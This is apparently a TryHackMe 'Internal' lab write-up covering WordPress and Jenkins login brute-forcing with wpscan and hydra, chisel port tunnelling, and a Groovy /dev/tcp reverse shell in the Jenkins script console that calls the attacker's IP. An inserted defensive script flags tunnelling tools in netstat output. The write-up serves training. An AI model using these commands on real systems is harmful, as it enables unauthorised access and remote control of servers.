THM Internal
This was an amazing challenge! I learned a few new tricks, so I thought I'd document it here real quick.
It all started with a WordPress site....
Easy brute-force with wpscan:
wpscan --url http://10.10.40.183/wordpress/ -U wp_users.txt -P /usr/share/wordlists/rockyou.txt
Lucky weeee. We got the admin password. First thing to do is to insert a reverse shell into the WordPress theme. Sounds like shell is on the menu, boooys.
Next, enumerate a little and we see that Jenkins is running in a Docker container spawned by the user aubreanna. Sounds like root with extra steps. I thought I needed to escape the Docker container somehow to get root. But wait, there's less.
www-data@internal:/$ ps auxf | grep jenkins
ps auxf | grep jenkins
aubrean+ 1491 0.0 0.0 1148 4 ? Ss 17:22 0:00 \_ /sbin/tini -- /usr/local/bin/jenkins.sh
aubrean+ 1525 2.5 16.1 2596000 329676 ? Sl 17:22 0:50 \_ java -Duser.home=/var/jenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -jar /usr/share/jenkins/jenkins.war
aubrean+ 1564 0.0 0.0 0 0 ? Z 17:22 0:00 \_ [jenkins.sh] <defunct>
www-data 2306 0.0 0.0 11464 1008 ? S 17:55 0:00 | \_ grep jenkins
www-data@internal:/$ netstat -tulnp
netstat -tulnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:37707 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::4444 :::* LISTEN 1907/./chisel_1.7.7
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 10.10.173.250:68 0.0.0.0:* -
Here comes the new trick I've learned. VERY NOICE:
Jenkins only listens on 127.0.0.1:8080, so how do I expose this service so I can exploit it?
chisel to the rescue.
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.
Run the chisel client on your attacking machine; it maps local port 2222 to 127.0.0.1:8080 on the target:
./chisel_1.7.7_linux_amd64 client internal.thm:4444 2222:127.0.0.1:8080
This connects to the chisel server on the target box, which is the chisel process listening on port 4444 in the netstat output above:
./chisel_1.7.7_linux_amd64 server -p 4444
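From the defender's side, the netstat listing above is exactly where this pivot shows up: a tunnelling binary listening on an unexpected port, plus loopback-only services (Jenkins, MySQL) that stop being "internal" the moment someone has a foothold. The following triage script is an added example and not part of the writeup; the baseline ports and the tool-name list are assumptions, and the sample rows are copied from the listing above.

```python
# Sample input: listening sockets copied from the netstat -tulnp output above.
NETSTAT_SAMPLE = """\
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::4444 :::* LISTEN 1907/./chisel_1.7.7
udp 0 0 10.10.173.250:68 0.0.0.0:* -
"""

EXPECTED_PUBLIC_PORTS = {22, 80}  # assumed baseline: what this web server should expose
TUNNEL_TOOLS = ("chisel", "ligolo", "socat", "ngrok")  # assumed list of pivoting tools

def parse_netstat(text):
    """Parse netstat -tulnp rows. UDP rows have no State column, so the
    PID/Program column sits one position further left than for TCP."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("tcp", "tcp6", "udp", "udp6"):
            continue
        addr, port = parts[3].rsplit(":", 1)
        prog_idx = 6 if parts[0].startswith("tcp") else 5
        prog = parts[prog_idx] if len(parts) > prog_idx else "-"
        rows.append({"proto": parts[0], "addr": addr, "port": int(port), "prog": prog})
    return rows

def triage(rows):
    """Return (alerts, loopback_only). Alerts: TCP listeners that are a known
    tunnelling tool or bound on a non-loopback address outside the baseline.
    loopback_only: services an intruder can still reach through such a tunnel."""
    alerts, loopback_only = [], []
    for r in rows:
        if not r["proto"].startswith("tcp"):
            continue
        if any(t in r["prog"].lower() for t in TUNNEL_TOOLS):
            alerts.append((r["port"], "tunnel tool: " + r["prog"]))
        if r["addr"].startswith("127.") or r["addr"] == "::1":
            loopback_only.append(r["port"])
        elif r["port"] not in EXPECTED_PUBLIC_PORTS:
            alerts.append((r["port"], "unexpected exposed listener: " + r["prog"]))
    return alerts, loopback_only

if __name__ == "__main__":
    alerts, loopback_only = triage(parse_netstat(NETSTAT_SAMPLE))
    for port, why in alerts:
        print(f"ALERT port {port}: {why}")
    print("loopback-only services reachable via a pivot:", loopback_only)
```

On the sample rows it raises two alerts for port 4444 (tunnel tool, unexpected listener) and lists 3306 and 8080 as the loopback-only services the tunnel would expose.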
Quickly brute-force the Jenkins login:
hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 2222 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
Now you are able to access the Jenkins script console at http://localhost:2222/script and add your reverse shell:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.8.49.147/1339;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Now, chilling in the Docker container, we enumerate some more until we find a note.txt that contains the root password for the box. What?
Yes, that's it....